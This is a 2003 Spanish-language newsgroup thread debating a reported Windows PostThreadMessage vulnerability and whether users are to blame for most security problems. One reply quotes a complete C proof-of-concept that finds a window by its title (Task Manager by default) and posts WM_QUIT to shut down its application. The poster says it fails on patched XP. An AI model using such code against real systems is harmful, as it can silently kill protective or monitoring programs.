[SEGURIDAD] seguimos con el culo al aire

06/10/2003 - 12:53 por Fede Ratas | Informe spam
http://www.vsantivirus.com/vul-postthread.htm

ya que microsoft no lo hace, que los listos de este foro
nos digan como protegernos contra esto.

Preguntas similare

Leer las respuestas

#6 JM Tella Llop [MS MVP] ·
06/10/2003 - 15:52 | Informe spam
La vulnerabilidad solo radica por un programa malicioso por un usuario malicioso que esté "dentro" de tu propia maquina. El impacto es pequeño.


Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"Hawat" wrote in message news:blrr67$p06$

"Fede Ratas" escribió en el mensaje
news:0fcf01c38bf8$07613ff0$
> http://www.vsantivirus.com/vul-postthread.htm
>
> ya que microsoft no lo hace, que los listos de este foro
> nos digan como protegernos contra esto.

Hola:

1) No soy un listillo.

2) La mayoria de las veces podriamos "taparnos el culo" usando simplemente
el sentido comun y configurando bien nuestro s.o. (en este foro han
explicado varias veces).


Respuesta Responder a este mensaje
#7 Hawat
06/10/2003 - 17:08 | Informe spam
"JM Tella Llop [MS MVP] ·" escribió en el mensaje


news:uvR%>
La vulnerabilidad solo radica por un programa malicioso por un usuario


malicioso que esté "dentro" de tu propia maquina. El >impacto es pequeño.



Hola;

A esto me refiero.
La mayoría de las veces se publican vulnerabilidades y "fallos" que son
perfectamente evitables si el usuario usa su computadora de forma
responsable. No quiero decir que no se deban instalar SP, usar antivirus y
cortafuegos, simplemente creo que muchas veces es mas la paranoia que el
efecto real del problema, y otras veces es debido a la poca responsabilidad
del usuario (ejecutar ficheros recibidos descargados de Inet, aceptar y
abrir correos desconocidos, usar soft "pirata" y estar "abonado" a redes
P2P.
El 99,99% de los problemas que he sufrido con Windows fueron "por mi culpa"
(desconocimiento del S.O., no leer la documentación de los productos a
instalar, trabajar de "oído").
Esto es algo que cuesta reconocer y no creo que sea el único usuario que "ha
metido la pata". Por esto tengo capturado este grupo de noticias, para saber
que debo hacer, que no debo hacer y aprender a que no podemos esperar tener
un S.O. perfecto si los propios usuarios no lo somos.
:-)

Saludos.

Hawat
Respuesta Responder a este mensaje
#8 luismi
06/10/2003 - 17:08 | Informe spam
Los habituales de este foro no vamos de listos por la vida, pero tu parece
que haces honor a la segunda palabra de tu nik.
"Fede Ratas" escribió en el mensaje
news:0fcf01c38bf8$07613ff0$
http://www.vsantivirus.com/vul-postthread.htm

ya que microsoft no lo hace, que los listos de este foro
nos digan como protegernos contra esto.
Respuesta Responder a este mensaje
#9 JM Tella Llop [MS MVP] ·
06/10/2003 - 17:38 | Informe spam
Ademas por las prueba que he hecho. creo que es una metedura de pata de VsAntivirus y de algunas web mas.

Veamos: el articulo original salió publicado:

=
= http://www.security-assessment.com
= Originally posted: October 02, 2003

y creo que nadie lo ha revisado. Existia una vulnerabilidad hace 6 meses mas o menos que permitis a un programa enviar cualquier comando a otro es decir, podias enviar cualquier mensaje a una ventana activa o un icono (y no solo los de cierre como WM_QUIT). y eran aceptados. Si es así, está solucionado con uno de los parches de seguridad de hace mas o menos esa fecha.

El programa de prueba que dan en esa web no funciona con los actuales XP. Por tanto, creo que es "retomar" una vieja vulnerabilidad, o que afecta a sistemas que no estan actualizados y darle propaganda ahora. Como la red, es un mundo de cotillas, y lo que es peor, cotillas que no prueban nada antes de publicarlo se ha extendido como la polvora.

Pero juro, que el programa ese, no cierra nada.. aquí está el codigo que han puesto de ejemplo:

/************************************************************************
* Appshutdown.c
*
* Demonstrates the use of PostThreadMessage to;
* - shutdown any application with a message handler
*
* The window title can be specified in code or on the command line
*
* Works against any application/service process that
* has implemented a message handler
*
*************************************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
long hWnd,proc;
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessage");
printf("%% ");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;

printf("+ Finding %s Window...",pWindow);
hWnd = (long)FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Window",pWindow);
return 0;
}
printf("+ Found Main Window At...0x%xh",hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(hWnd,&proc);
if(hThread == NULL)
{
printf("Failed");
return 0;
}
printf("0x%xh Process 0x%xh",hThread,proc);
printf("+ Send Quit Message");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...");
return 0;
}

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"Hawat" wrote in message news:bls0o1$kpv$

>"JM Tella Llop [MS MVP] ·" escribió en el mensaje
news:uvR%>
>La vulnerabilidad solo radica por un programa malicioso por un usuario
malicioso que esté "dentro" de tu propia maquina. El >impacto es pequeño.



Hola;

A esto me refiero.
La mayoría de las veces se publican vulnerabilidades y "fallos" que son
perfectamente evitables si el usuario usa su computadora de forma
responsable. No quiero decir que no se deban instalar SP, usar antivirus y
cortafuegos, simplemente creo que muchas veces es mas la paranoia que el
efecto real del problema, y otras veces es debido a la poca responsabilidad
del usuario (ejecutar ficheros recibidos descargados de Inet, aceptar y
abrir correos desconocidos, usar soft "pirata" y estar "abonado" a redes
P2P.
El 99,99% de los problemas que he sufrido con Windows fueron "por mi culpa"
(desconocimiento del S.O., no leer la documentación de los productos a
instalar, trabajar de "oído").
Esto es algo que cuesta reconocer y no creo que sea el único usuario que "ha
metido la pata". Por esto tengo capturado este grupo de noticias, para saber
que debo hacer, que no debo hacer y aprender a que no podemos esperar tener
un S.O. perfecto si los propios usuarios no lo somos.
:-)

Saludos.

Hawat


Respuesta Responder a este mensaje
#10 Mtiend
06/10/2003 - 19:11 | Informe spam
Te equivocas.
Aquí no hay listos.
Lo que si que hay es:
Personas que han dedicado y dedican muchas horas y esfuerzo a aprender.
Personas que responde a las dudas y preguntas de los demás.
Personas que responden a quien pregunta.
Personas que te pueden resolver un problema con el ordenador y con el
sistema operativo.
Y por supuesto lo que sobran son los malintencionados.
Y, tú ¿A que grupo de personas quieres pertenecer?
Un listo saludo,
J.Luis.
Respuesta Responder a este mensaje
Ads by Google
Help Hacer una preguntaSiguiente AnteriorRespuesta Tengo una respuesta
Search Busqueda sugerida